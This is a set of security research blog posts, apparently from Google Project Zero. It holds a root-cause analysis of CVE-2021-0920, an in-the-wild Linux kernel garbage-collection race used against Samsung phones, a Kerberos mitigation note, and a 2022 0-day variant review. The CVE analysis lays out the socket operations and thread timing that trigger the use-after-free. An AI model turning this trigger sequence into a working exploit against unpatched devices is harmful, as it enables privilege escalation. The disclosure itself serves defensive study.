It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended, however that can bring its own problems. If this particular vulnerability was being exploited in the wild it should be pretty easy to detect. Also unusual Kerberos encryption types would be an immediate red-flag as well as the repeated login attempts.


Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However it's not a panacea, for example for FAST to work the domain joined computer needs to first authenticate without FAST to get a key they can then use for protecting the communications. If that initial authentication is compromised the entire protection fails.


The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

10 August 2022 at 23:00

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego has developed an exploit for Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 based on the earliest captured sample, until the issue was fixed in November 2021.  Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this “queued” state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {

        short                   count;

        short                   max;

        struct user_struct      *user;

        struct file             *fp[SCM_MAX_FD];

};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {

        struct pid              *pid;           /* Skb credentials */

        struct scm_fp_list      *fp;            /* Passed files         */

        struct scm_creds        creds;          /* Skb credentials      */

#ifdef CONFIG_SECURITY_NETWORK

        u32                     secid;          /* Passed security ID   */

#endif

};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*

 * Need to duplicate file references for the sake of garbage

 * collection.  Otherwise a socket in the fps might become a

 * candidate for GC while the skb is not yet queued.

 */

UNIXCB(skb).fp = scm_fp_dup(scm->fp);

if (!UNIXCB(skb).fp)

        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)

{

        struct scm_fp_list *new_fpl;

        int i;

        if (!fpl)

                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),

                          GFP_KERNEL);

        if (new_fpl) {

                for (i = 0; i < fpl->count; i++)

                        get_file(fpl->fp[i]);

                new_fpl->max = new_fpl->count;

                new_fpl->user = get_uid(fpl->user);

        }

        return new_fpl;

}

Let’s examine a concrete example. Assume we have sockets A and B. The A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to the B’s sk_receive_queue which stores received datagrams:

unix_stream_sendmsg creates sk_buff which contains the structure scm_fp_list. The scm_fp_list has a fp pointer points to the transmitted file (A). The sk_buff is appended to the receiver queue and the reference count of A is 2.

sk_buff carries scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */

if (!(flags & MSG_PEEK)) {

        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))

                break;

        skb_unlink(skb, &sk->sk_receive_queue);

        consume_skb(skb);

        if (scm.fp)

                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;

     i++, cmfptr++)

{

        struct socket *sock;

        int new_fd;

        err = security_file_receive(fp[i]);

        if (err)

                break;

        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags

                                  ? O_CLOEXEC : 0);

        if (err < 0)

                break;

        new_fd = err;

        err = put_user(new_fd, cmfptr);

        if (err) {

                put_unused_fd(new_fd);

                break;

        }

        /* Bump the usage count and install the file. */

        sock = sock_from_file(fp[i], &err);

        if (sock) {

                sock_update_netprioidx(&sock->sk->sk_cgrp_data);

                sock_update_classid(&sock->sk->sk_cgrp_data);

        }

        fd_install(new_fd, get_file(fp[i]));

}

/*

 * All of the files that fit in the message have had their

 * usage counts incremented, so we just free the list.

 */

__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)

{

        struct scm_fp_list *fpl = scm->fp;

        int i;

        if (fpl) {

                scm->fp = NULL;

                for (i=fpl->count-1; i>=0; i--)

                        fput(fpl->fp[i]);

                free_uid(fpl->user);

                kfree(fpl);

        }

}

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

Socket A and B form a reference count cycle.

Scenario for reference count cycle

Both sockets are closed prior to accepting the passed file descriptors.The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {

                        BUG_ON(!list_empty(&u->link));

                        list_add_tail(&u->link, &gc_inflight_list);

                } else {

                        BUG_ON(list_empty(&u->link));

                }

                unix_tot_inflight++;

        }

        user->unix_inflight++;

        spin_unlock(&unix_gc_lock);

}

Thus, here is what the sk_buff looks like when transferring a file descriptor within sockets A and B:

When the file descriptor A sends itself to the file descriptor B, the reference count of the file descriptor A is 2 and the inflight count is 1. For the receiver file descriptor B, the file reference count is 1 and the inflight count is 0.

The inflight count of A is incremented

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle: 

The file descriptor A sends itself to the file descriptor B and vice versa. The inflight count of the file descriptor A and B is both 1 and the file reference count is both 2.

Breakable cycle before close A and B

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

The cycle becomes unbreakable after closing A and B. The reference count equals to the inflight count for A and B.

Unbreakable cycle after close A and B

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

A, B and alpha form a breakable cycle.

Breakable cycle for A, B and 𝛼

The cycle is breakable, because we can get newly installed file descriptor B from the socket file descriptor 𝛼 and newly installed file descriptor A' from B’.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left.

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {

        long total_refs;

        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);

        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);

        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {

                list_move_tail(&u->link, &gc_candidates);

                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

        }

}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of

 * the candidates.

 */

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, dec_inflight, NULL);

After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored.

To do this, the kernel will put the candidate to not_cycle_list instead and iterates through its receiver queue of each transmitted file in the gc_candidates list (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:

/* Restore the references for children of all candidates,

 * which have remaining references.  Do this recursively, so

 * only those remain, which form cyclic references.

 *

 * Use a "cursor" link, to make the list traversal safe, even

 * though elements might be moved about.

 */

list_add(&cursor, &gc_candidates);

while (cursor.next != &gc_candidates) {

        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */

        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {

                list_move_tail(&u->link, &not_cycle_list);

                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

                scan_children(&u->sk, inc_inflight_move_tail, NULL);

        }

}

list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original

 * inflight counters for these as well, and remove the skbuffs

 * which are creating the cycle(s).

 */

skb_queue_head_init(&hitlist);

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a

 * cycle.  Restore these to the inflight list.

 */

while (!list_empty(&not_cycle_list)) {

        u = list_entry(not_cycle_list.next, struct unix_sock, link);

        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

        list_move_tail(&u->link, &gc_inflight_list);

}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */

__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**

 *      __skb_queue_purge - empty a list

 *      @list: list to empty

 *

 *      Delete all buffers on an &sk_buff list. Each buffer is removed from

 *      the list and one reference dropped. This function does not take the

 *      list lock and the caller must hold the relevant locks to use it.

 */

void skb_queue_purge(struct sk_buff_head *list);

static inline void __skb_queue_purge(struct sk_buff_head *list)

{

        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)

                kfree_skb(skb);

}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f 00 sends socket f 00 to socket f 01.
  2. Socket f 01 sends socket f 01 to socket 𝛼.
  3. Close f 00.
  4. Close f 01.

Before starting the garbage collection process, the status of socket file descriptors are:

  • f 00: ref = 1, inflight = 1
  • f 01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

f00, f01 and alpha form a breakable cycle.

Breakable cycle by f 00, f 01 and 𝛼

During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. Then, the function unix_stream_read_generic calls unix_detach_fds to decrement the inflight count. Then, unix_detach_fds clears the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)

{

        int i;

        scm->fp = UNIXCB(skb).fp;

        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)

                unix_notinflight(scm->fp->user, scm->fp->fp[i]);

}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))

                        list_del_init(&u->link);

                unix_tot_inflight--;

        }

        user->unix_inflight--;

        spin_unlock(&unix_gc_lock);

}

Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)

{

        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));

        scm.pid  = UNIXCB(skb).pid;

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */

        /* So fscking what? fput() had been SMP-safe since the last Summer */

        scm_destroy(&scm);

        sock_wfree(skb);

}

In fact, the unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked for installing a new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):

/* It is questionable, see note in unix_dgram_recvmsg.

 */

if (UNIXCB(skb).fp)

        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)

        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f 00, f 01
  • f 10, f 11

Now, the program does the following operations:

  • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
  • f 10 → [f 00] → f 11
  • Close(f 00)

f00, f01, f10, f11 forms a breakable cycle.

Breakable cycle by f 00, f 01, f 10 and f 11

Here is the status:

  • inflight(f 00) = 2, ref(f 00) = 2
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.

If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:

After f01 receives the socket file descriptor by MSG_PEEK, the reference count of f00 is incremented and the receive queue from f01 remains the same.

MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared

Status:

  • inflight(f 00) = 2, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

Then, f 01 calls recvmsg without MSG_PEEK flag, f 01’s receive queue is removed. f 01 also fetches a new file descriptor f 00'':

After f01 receives the socket file descriptor without MSG_PEEK, the receive queue is cleared and file descriptor f00''' is obtained.

The receive queue of f 01 is cleared and f 01'' is obtained from f 01

Status:

  • inflight(f 00) = 1, ref(f 00) = 3
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

UAF Scenario

From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼:

  • f 00, f 01
  • f 10, f 11
  • f 20, f 21
  • f 30, f 31
  • sock 𝛼 (actually there might be even thousands of 𝛼 for protracting the garbage collection process in order to evade a BUG_ON check which will be introduced later).

Now, the program does the below operations:

Close the following file descriptors prior to any recvmsg calls:

  • Close(f 00)
  • Close(f 01)
  • Close(f 11)
  • Close(f 10)
  • Close(f 30)
  • Close(f 31)
  • Close(𝛼)

Here is the status:

  • inflight(f 00) = N + 1, ref(f 00) = N + 1
  • inflight(f 01) = 2, ref(f 01) = 2
  • inflight(f 10) = 3, ref(f 10) = 3
  • inflight(f 11) = 1, ref(f 11) = 1
  • inflight(f 20) = 0, ref(f 20) = 1
  • inflight(f 21) = 0, ref(f 21) = 1
  • inflight(f 31) = 1, ref(f 31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel will do the following scrutiny:

  • List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue.
  • Since f 21 is not considered a candidate, f 11’s inflight count is still above zero.
  • Recursively restore the inflight count.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’.
  2. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’.
  3. Concurrently do the following operations:
  1. Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’.
  2. Call recvmsg with MSG_PEEK flag from f 10

How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidate

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Recursively restore inflight count if a candidate still has inflight count.

Stage1: All inflight counts have been restored.

Stage2: No garbage, return.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

Call recvmsg with MSG_PEEK flag from f 10

Everyone is happy

Everyone is happy

Everyone is happy

However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:

Thread 0

Thread 1

Thread 2

Call unix_gc

Stage0: List f 00, f 01, f 10,  f 11, f 31, 𝛼 as garbage candidates.

Call recvmsg with MSG_PEEK flag from f 21 to get f 11

Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);

Stage0: decrease inflight count from the child of every garbage candidates

Status after stage 0:

inflight(f 00) = 0

inflight(f 01) = 0

inflight(f 10) = 0

inflight(f 11) = 1

inflight(f 31) = 0

inflight(𝛼) = 0

Stage1: Start restoring inflight count.

Call recvmsg with MSG_PEEK flag from f 11 to get f 10

Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’

unix_detach_fds: UNIXCB(skb).fp = NULL

Blocked by spin_lock(&unix_gc_lock)

Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same.

Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage.

Stage2: start purging garbage.

Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00'

Get skb = skb_peek(&sk->sk_receive_queue), skb is going to be freed by thread 0.

Stage2: for, calls __skb_unlink and kfree_skb later.

state->recv_actor(skb, skip, chunk, state) UAF

GC finished.

Start garbage collection.

Get f 10’’

Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the following next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

 

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided the correct patch advice but it was not accepted by the Linux kernel community:

Linux kernel developers: Why would I apply a patch that's an RFC, doesn't have a proper commit message, lacks a proper signoff, and also lacks ACK's and feedback from other knowledgable developers?

Patch was not applied in 2016

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);

+       spin_unlock(&unix_gc_lock);

The patch is confusing - it’s rare to see such lock usage in software development. Regardless, the MSG_PEEK flag now waits for the completion of the garbage collector, so the UAF issue is resolved.

BUG_ON Added in 2017

Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

        if (s) {

                struct unix_sock *u = unix_sk(s);

 

+               BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

 

                if (atomic_long_dec_and_test(&u->inflight))

At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage,  it can waive the BUG_ON check by heap spray.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.

\

Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF by a subtle and arcane race condition.

The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.

2022 0-day In-the-Wild Exploitation…so far

30 June 2022 at 13:00

Posted by Maddie Stone, Google Project Zero

This blog post is an overview of a talk, “ 0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.

For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.        

As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.  

Product

2022 ITW 0-day

Variant

Windows win32k

CVE-2022-21882

CVE-2021-1732 (2021 itw)

iOS IOMobileFrameBuffer

CVE-2022-22587

CVE-2021-30983 (2021 itw)

Windows

CVE-2022-30190 (“Follina”)

CVE-2021-40444 (2021 itw)

Chromium property access interceptors

CVE-2022-1096

CVE-2016-5128 CVE-2021-30551 (2021 itw) CVE-2022-1232 (Addresses incomplete CVE-2022-1096 fix)

Chromium v8

CVE-2022-1364

CVE-2021-21195

WebKit

CVE-2022-22620 (“Zombie”)

Bug was originally fixed in 2013, patch was regressed in 2016

Google Pixel

CVE-2021-39793*

* While this CVE says 2021, the bug was patched and disclosed in 2022

Linux same bug in a different subsystem

Atlassian Confluence

CVE-2022-26134

CVE-2021-26084

Windows

CVE-2022-26925 (“PetitPotam”)

CVE-2021-36942 (Patch regressed)

So, what does this mean?

When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.

